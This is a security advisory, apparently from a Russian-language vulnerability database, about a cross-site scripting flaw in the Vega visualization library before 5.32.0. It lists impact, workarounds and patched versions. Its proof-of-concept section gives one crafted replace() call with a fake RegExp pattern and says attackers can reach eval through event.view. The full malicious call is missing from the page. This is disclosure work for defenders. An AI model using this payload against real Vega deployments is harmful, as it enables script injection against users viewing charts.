Описание
Vega vulnerable to Cross-site Scripting via RegExp.prototype[@@replace]
Impact
Users running Vega/Vega-lite JSON definitions could run unexpected JavaScript code when drawing graphs, unless the library is used with the vega-interpreter.
Workarounds
- Use
vegawith expression interpreter - Upgrade to a newer Vega version (
5.32.0)
POC Summary
Calling replace with a RegExp-like pattern calls RegExp.prototype[@@replace], which can then call an attacker-controlled exec function.
POC Details
Consider the function call replace('foo', {__proto__: /h/.constructor.prototype, global: false}). Since pattern has RegExp.prototype[@@replace], pattern.exec('foo') winds up being called.
The resulting malicious call looks like this:
Since functions cannot be returned from this, an attacker that wishes to escalate to XSS must abuse event.view to gain access to eval.
Reproduction steps
Пакеты
vega
< 5.32.0
5.32.0
vega-functions
< 5.17.0
5.17.0
Связанные уязвимости
Vega is a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs. In Vega prior to version 5.32.0, corresponding to vega-functions prior to version 5.17.0, users running Vega/Vega-lite JSON definitions could run unexpected JavaScript code when drawing graphs, unless the library was used with the `vega-interpreter`. Vega version 5.32.0 and vega-functions version 5.17.0 fix the issue. As a workaround, use `vega` with expression interpreter.
Vega is a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs. In Vega prior to version 5.32.0, corresponding to vega-functions prior to version 5.17.0, users running Vega/Vega-lite JSON definitions could run unexpected JavaScript code when drawing graphs, unless the library was used with the `vega-interpreter`. Vega version 5.32.0 and vega-functions version 5.17.0 fix the issue. As a workaround, use `vega` with expression interpreter.
Vega is a visualization grammar, a declarative format for creating, sa ...